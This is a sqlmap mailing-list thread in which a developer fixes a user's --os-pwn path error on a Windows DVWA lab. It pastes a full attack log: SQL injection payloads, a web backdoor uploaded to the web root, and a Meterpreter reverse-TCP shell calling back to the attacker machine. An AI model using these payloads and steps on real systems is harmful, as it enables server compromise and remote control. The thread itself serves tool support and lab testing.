Re: [sqlmap-users] mysql os-pwn options on windows
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:17:15
|
In your case, problem is the --tmp-path. Have you manually set it to "/tmp"? If so, it is wrongly set to a linux path while you should put it to a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of temporary files directory) Bye On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar < mir...@gm...> wrote: > $ sudo python sqlmap.py -u " > http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn > [sudo] password for stamparm: > _ > ___ ___| |_____ ___ ___ {1.0.4.21#dev} > |_ -| . | | | .'| . | > |___|_ |_|_|_|_|__,| _| > |_| |_| http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 09:11:45 > > [09:11:45] [WARNING] you did not provide the local path where Metasploit > Framework is installed > [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework > installation inside the environment path(s) > [09:11:45] [INFO] Metasploit Framework has been found installed in the > '/usr/bin' path > [09:11:45] [INFO] resuming back-end DBMS 'mysql' > [09:11:45] [INFO] testing connection to the target URL > [09:11:45] [INFO] heuristics detected web page charset 'ascii' > [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body > which could interfere with the results of the tests > sqlmap resumed the following injection point(s) from stored session: > --- > Parameter: id (GET) > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: id=1 AND 2546=2546 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP > BY clause > Payload: id=1 AND (SELECT 8079 FROM(SELECT > COUNT(*),CONCAT(0x7178767071,(SELECT > (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) > > Type: AND/OR time-based blind > Title: MySQL >= 5.0.12 AND time-based blind (SELECT) > Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU) > > Type: UNION query > Title: Generic UNION query (NULL) - 3 columns > Payload: id=1 UNION ALL SELECT > NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)-- > epjZ > --- > [09:11:45] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL 5.0 > [09:11:45] [INFO] fingerprinting the back-end DBMS operating system > [09:11:45] [INFO] the back-end DBMS operating system is Windows > how do you want to establish the tunnel? > [1] TCP: Metasploit Framework (default) > [2] ICMP: icmpsh - ICMP tunneling > > > [09:11:46] [INFO] going to use a web backdoor to establish the tunnel > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] JSP > [4] PHP (default) > > > [09:11:47] [WARNING] unable to retrieve automatically the web server > document root > what do you want to use for writable directory? > [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default) > [2] custom location(s) > [3] custom directory list file > [4] brute force search > > 1 > [09:12:02] [WARNING] unable to automatically parse any web server path > [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via > LIMIT 'LINES TERMINATED BY' method > [09:12:02] [INFO] the file stager has been successfully uploaded on > '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php > [09:12:02] [INFO] the backdoor has been successfully uploaded on > '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php > [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode > which connection type do you want to use? > [1] Reverse TCP: Connect back from the database host to this machine > (default) > [2] Reverse TCP: Try to connect back from the database host to this > machine, on all ports between the specified and 65535 > [3] Reverse HTTP: Connect back from the database host to this machine > tunnelling traffic over HTTP > [4] Reverse HTTPS: Connect back from the database host to this machine > tunnelling traffic over HTTPS > [5] Bind TCP: Listen on the database host for a connection > > > what is the local address? [Enter for '192.168.146.1' (detected)] > which local port number do you want to use? [59643] > which payload do you want to use? > [1] Meterpreter (default) > [2] Shell > [3] VNC > > > [09:12:04] [INFO] creation in progress ..... done > [09:12:09] [INFO] uploading shellcodeexec to > 'C:/Windows/Temp/tmpsehply.exe' > [09:12:09] [INFO] shellcodeexec successfully uploaded > [09:12:09] [INFO] running Metasploit Framework command line interface > locally, please wait.. > > > ______________________________________________________________________________ > | > | > | METASPLOIT CYBER MISSILE COMMAND V4 > | > > |______________________________________________________________________________| > \ / / > \ . / / > x > \ / / > \ / + / > \ + / / > * / / > / . / > X / / X > / ### > / # % # > / ### > . / > . / . * . > / > * > + * > > ^ > #### __ __ __ ####### __ __ __ > #### > #### / \ / \ / \ ########### / \ / \ / \ > #### > > ################################################################################ > > ################################################################################ > # WAVE 4 ######## SCORE 31337 ################################## HIGH > FFFFFFFF # > > ################################################################################ > > http://metasploit.pro > > > =[ metasploit v4.11.8-dev-a030179 ] > + -- --=[ 1527 exploits - 880 auxiliary - 259 post ] > + -- --=[ 437 payloads - 38 encoders - 8 nops ] > + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] > > PAYLOAD => windows/meterpreter/reverse_tcp > EXITFUNC => process > LPORT => 59643 > LHOST => 192.168.146.1 > [*] Started reverse TCP handler on 192.168.146.1:59643 > [*] Starting the payload handler... > [09:12:18] [INFO] running Metasploit Framework shellcode remotely via > shellcodeexec, please wait.. > [09:12:23] [WARNING] turning off pre-connect mechanism because of > connection time out(s) > [*] Sending stage (957487 bytes) to 192.168.146.132 > > meterpreter > > > > On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...> > wrote: > >> hi all, >> >> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA >> windows machine" >> >> i got an error >> >> [WARNING] unable to upload the file through the web file stager to '/tmp' >> >> i wonder is it only avaliable for linux OS ? >> >> thanks >> Indra Z >> >> -- >> --from the net with zero space-- >> >> >> ------------------------------------------------------------------------------ >> Find and fix application performance issues faster with Applications >> Manager >> Applications Manager provides deep performance insights into multiple >> tiers of >> your business applications. It resolves application problems quickly and >> reduces your MTTR. Get your free trial! >> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |